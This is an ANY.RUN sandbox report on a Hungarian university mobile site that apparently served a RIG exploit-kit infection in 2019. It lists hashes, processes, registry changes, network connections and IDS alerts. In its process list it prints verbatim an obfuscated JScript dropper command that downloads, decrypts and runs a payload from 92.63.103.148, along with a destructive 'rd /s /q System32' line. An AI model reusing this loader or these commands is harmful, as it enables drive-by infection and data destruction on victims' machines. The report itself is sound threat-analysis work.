analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://mobi.unideb.hu/

Full analysis: https://app.any.run/tasks/77f37497-f84f-4417-840e-4823520f6e47
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 08:59:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
adware
trojan
RigEK
Indicators:
MD5:

5107C3F03B4F64D0AD7F125F6788115D

SHA1:

A99248A7C3CB9865D587B4E749BCD8906B65A9DA

SHA256:

602692DDE37EF13CF6387683210976C4F2BC987C181A99EAFB5467316A39DF66

SSDEEP:

3:N1KT0MK:CAMK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads dropped or rewritten executable

      • iexplore.exe (PID: 3408)

    • Application was dropped or rewritten from another process

      • 6w03si33.exe (PID: 3168)
      • 6w03si33.exe (PID: 3172)

    • Starts CMD.EXE for commands execution

      • iexplore.exe (PID: 3408)

    • Connects to CnC server

      • iexplore.exe (PID: 3408)

  • SUSPICIOUS

    • Executed via COM

      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3152)

    • Executable content was dropped or overwritten

      • iexplore.exe (PID: 3408)
      • 6w03si33.exe (PID: 3168)

    • Executes scripts

      • CMd.exe (PID: 3540)

    • Uses WMIC.EXE to create a new process

      • 6w03si33.exe (PID: 3172)

    • Executed via WMI

      • 6w03si33.exe (PID: 3168)

  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2892)

    • Changes internet zones settings

      • iexplore.exe (PID: 2892)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 3408)
      • iexplore.exe (PID: 2892)

    • Creates files in the user directory

      • iexplore.exe (PID: 3408)
      • iexplore.exe (PID: 2892)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3152)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3408)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2892)
      • iexplore.exe (PID: 3408)

    • Application was crashed

      • iexplore.exe (PID: 3408)

    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2892)

    • Changes settings of System certificates

      • iexplore.exe (PID: 2892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
9
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe flashutil32_26_0_0_131_activex.exe no specs cmd.exe no specs 6w03si33.exe no specs cmd.exe no specs wscript.exe wmic.exe 6w03si33.exe

Process information

PID
CMD
Path
Indicators
Parent process
2892"C:\Program Files\Internet Explorer\iexplore.exe" "http://mobi.unideb.hu/"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3408"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2892 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3152C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Version:
26,0,0,131
2580cmd.exe /c start %SysFilename% & rd /s /q System32C:\Windows\system32\cmd.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3172C:\Users\admin\AppData\Local\Temp\Low\6w03si33.exe C:\Users\admin\AppData\Local\Temp\Low\6w03si33.execmd.exe
User:
admin
Company:
© pdfforge GmbH.
Integrity Level:
LOW
Description:
L2tp Explores Was Xinclude Mentality
Exit code:
0
3540CMd.exe /q /c cd /d "%tmp%" && echo function Q(n,g){for(var c=0,s=String,d,D="pus"+"h",b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g["length"])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O="fromC",S=O+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E="WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s ",u=function(x){return E["split"]("I")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this["WScript"]]:0;U=U[1],L=U[u(14)],v=u(9),m=U["Ar"+"guments"];s.Type=2;c=q[u(8)]();s.Charset=u(012);s["Open"]/**/();i=H(m);d=i[v](i[u(12)]("PE\x00\x00")+027);s["writetext"](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K="saveto";s[K+"file"](c,2);s.Close();z^&^&(c="Regsvr32"+p+u(18)+c);j.run("cmd"+p+" /c "+c,0)}catch(DAAADDDD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+"."+T+u(1));d["SetProxy"](n);d["Op"+"en"](u(2),g(1),n);d["Option"](0)=g(2);d["Send"];if(0310==d.status)return Q(d.responseText,g(n))};>T.t && stArt wsCripT //B //E:JScript T.t "cNNN9ka" "http://92.63.103.148/?NTY4MTYx&WpSxKsNbrnbYHNX&uNhJcKwrkGncbX=professional&tpEwClRnooCM=blackmail&jVSvKKuFvH=heartfelt&UvUAuzqqZAaG=strategy&DeNPAe=criticized&hAOhSmZgoCctj=wrapped&zwcDvCHYG=strategy&HwbNDR=golfer&ffhd3s=wnjQMvXcJRXQFYbHKuXDSKJDKU7WFEaVw4-QhMG3YpbNfynz2ezURnL7tASVVFuRrbMdK7ED&t4gdfgf4=PAbpjEGCKAwzn4sJVF0Q9vqo2heHzh_J0ZKD9BfeYllMq5DHF7kL21j0x7MWdc0v90vC6mdg&syRobD=difference&wHslOSZVKmURBxT=already&XdmGuLdxpy=constitution&PVzkJHTLspcC=difference&iXfcEzsj=difference&FXnstQAvT=difference&CicdukbAnF=difference&CzWHFyZeuMTMwODUy" "¤"C:\Windows\system32\CMd.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2732wsCripT //B //E:JScript T.t "cNNN9ka" "http://92.63.103.148/?NTY4MTYx&WpSxKsNbrnbYHNX&uNhJcKwrkGncbX=professional&tpEwClRnooCM=blackmail&jVSvKKuFvH=heartfelt&UvUAuzqqZAaG=strategy&DeNPAe=criticized&hAOhSmZgoCctj=wrapped&zwcDvCHYG=strategy&HwbNDR=golfer&ffhd3s=wnjQMvXcJRXQFYbHKuXDSKJDKU7WFEaVw4-QhMG3YpbNfynz2ezURnL7tASVVFuRrbMdK7ED&t4gdfgf4=PAbpjEGCKAwzn4sJVF0Q9vqo2heHzh_J0ZKD9BfeYllMq5DHF7kL21j0x7MWdc0v90vC6mdg&syRobD=difference&wHslOSZVKmURBxT=already&XdmGuLdxpy=constitution&PVzkJHTLspcC=difference&iXfcEzsj=difference&FXnstQAvT=difference&CicdukbAnF=difference&CzWHFyZeuMTMwODUy" "¤"C:\Windows\system32\wscript.exe
CMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2572"C:\Windows\System32\wbem\WMIC.exe" process call create "C:\Users\admin\AppData\Local\Temp\Low\6w03si33.exe"C:\Windows\System32\wbem\WMIC.exe
6w03si33.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3168C:\Users\admin\AppData\Local\Temp\Low\6w03si33.exeC:\Users\admin\AppData\Local\Temp\Low\6w03si33.exe
wmiprvse.exe
User:
admin
Company:
© pdfforge GmbH.
Integrity Level:
HIGH
Description:
L2tp Explores Was Xinclude Mentality
Total events
765
Read events
682
Write events
80
Delete events
3

Modification events

(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{C22D46FF-DABB-11E9-B86F-5254004A04AF}
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
2
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E30709000400130008003B0011000602
Executable files
3
Suspicious files
0
Text files
60
Unknown types
35

Dropped files

PID
Process
Filename
Type
2892iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2892iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:D3970A344CDB98289AE6602ADB6ECA5E
SHA256:62425A117E8A525722CAA1EEC2BB6924DB5FC0E10970CACC1B76F76673EEDE12
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DOXU0BID\js_poZlFOAITdB9jcwZ034UU9Vu9QhgvOx4jMaa9aAshlo[1].jshtml
MD5:F11CA66C392EB09A6872BECAC4E8F21D
SHA256:A6866514E0084DD07D8DCC19D37E1453D56EF50860BCEC788CC69AF5A02C865A
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FCR4HL4M\js_kfUVo9862BFyaL94dX_i46wDZFv1h_awoYX4A5_zgL4[1].jstext
MD5:F98CCE11C0CACE3BBD065132E7B409B5
SHA256:91F515A3DF3AD8117268BF78757FE2E3AC03645BF587F6B0A185F8039FF380BE
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FCR4HL4M\css_0hDeYAtWJzriYUQotMqMBIhcwbCWrX66XRbSzQ75D0s[1].csstext
MD5:82F00867EB0E565F99EC2440DA897C3A
SHA256:D210DE600B56273AE2614428B4CA8C04885CC1B096AD7EBA5D16D2CD0EF90F4B
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\KWMHVIHB\css_qnkaz5lf6hQOtUS2mHJOZJ2JYUSCKswGu5ms66ZYDuU[1].csstext
MD5:080EE9D3141ABC1FA447F5F78A3A8926
SHA256:AA791ACF995FEA140EB544B698724E649D896144822ACC06BB99ACEBA6580EE5
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BQSOCX87\css_3JJWhei6qIBY7mE52MR51vwz8iCPhi-f2Xxg0jzu0EI[1].csstext
MD5:210F0D612A5EE7A92663BD0492EFE1BE
SHA256:DC925685E8BAA88058EE6139D8C479D6FC33F2208F862F9FD97C60D23CEED042
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:5FD7486D3B394EF6FD755FD8B1F59571
SHA256:6408CAD3B84B522C14BFB59EF2FE8FB9AA8F775E5933AF50B23E131F562073AB
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BQSOCX87\js_6Tv_HHzDISftO0tOK8iXweCne-54OX61ritjgb4XROo[1].jstext
MD5:F160854E128A1416A081785A7EA90DD8
SHA256:E93BFF1C7CC32127ED3B4B4E2BC897C1E0A77BEE78397EB5AE2B6381BE1744EA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
56
TCP/UDP connections
39
DNS requests
14
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/js/js_poZlFOAITdB9jcwZ034UU9Vu9QhgvOx4jMaa9aAshlo.js
HU
html
16.2 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_qnkaz5lf6hQOtUS2mHJOZJ2JYUSCKswGu5ms66ZYDuU.css
HU
text
6.84 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/
HU
html
68.3 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/js/js_vSmhpx_T-AShyt_WMW5_TcwwxJP1imoVOa8jvwL_mxE.js
HU
text
7.60 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_0hDeYAtWJzriYUQotMqMBIhcwbCWrX66XRbSzQ75D0s.css
HU
text
27.3 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_3JJWhei6qIBY7mE52MR51vwz8iCPhi-f2Xxg0jzu0EI.css
HU
text
1.55 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_xGpmgPjQGTMovJSAZ8ngTtkyWe6262r5x1GrxM3BGe4.css
HU
text
2.55 Kb
unknown
3408
iexplore.exe
GET
200
172.217.21.234:80
http://fonts.googleapis.com/css?family=Rokkitt:400,700&subset=latin,greek,greek-ext,cyrillic-ext,latin-ext,cyrillic
US
text
159 b
whitelisted
2892
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_xE-rWrJf-fncB6ztZfd2huxqgxu4WO-qwma6Xer30m4.css
HU
text
2.17 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2892
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3408
iexplore.exe
172.217.18.99:80
fonts.gstatic.com
Google Inc.
US
whitelisted
3408
iexplore.exe
172.217.21.234:80
fonts.googleapis.com
Google Inc.
US
whitelisted
3408
iexplore.exe
193.6.138.68:80
mobi.unideb.hu
NIIFI (Nemzeti Informacios Infrastruktura Fejlesztesi Iroda)
HU
unknown
3408
iexplore.exe
205.185.208.52:80
code.jquery.com
Highwinds Network Group, Inc.
US
unknown
2892
iexplore.exe
193.6.138.68:80
mobi.unideb.hu
NIIFI (Nemzeti Informacios Infrastruktura Fejlesztesi Iroda)
HU
unknown
2892
iexplore.exe
35.171.104.39:80
usa.odysseus-nua.com
Amazon.com, Inc.
US
malicious
2892
iexplore.exe
209.126.127.231:80
sslgateways.com
server4you Inc.
US
malicious
3408
iexplore.exe
209.126.103.59:80
upgraderservices.cf
server4you Inc.
US
malicious
3408
iexplore.exe
35.171.104.39:80
usa.odysseus-nua.com
Amazon.com, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
mobi.unideb.hu
  • 193.6.138.68
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
code.jquery.com
  • 205.185.208.52
whitelisted
fonts.googleapis.com
  • 172.217.21.234
whitelisted
fonts.gstatic.com
  • 172.217.18.99
whitelisted
www.google-analytics.com
  • 172.217.16.174
whitelisted
upgraderservices.cf
  • 209.126.103.59
  • 209.126.103.139
malicious
hashtag.connectioncdn.com
  • 209.126.103.59
malicious
stats.g.doubleclick.net
  • 74.125.71.157
  • 74.125.71.156
  • 74.125.71.154
  • 74.125.71.155
whitelisted
sslgateways.com
  • 209.126.127.231
  • 209.126.103.139
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .cf Domain
3408
iexplore.exe
Misc activity
ADWARE [PTsecurity] Redirecting.Zemot (RBN ZeroPark 0-Click)
Potentially Bad Traffic
ET INFO Observed DNS Query to .world TLD
3408
iexplore.exe
Potentially Bad Traffic
ET INFO HTTP Request to Suspicious *.world Domain
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS SunDown EK RIP Landing M1 B642
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS SunDown EK RIP Landing M1 B643
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
3408
iexplore.exe
Potential Corporate Privacy Violation
ET POLICY Outdated Flash Version M1
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
2732
wscript.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://mobi.unideb.hu/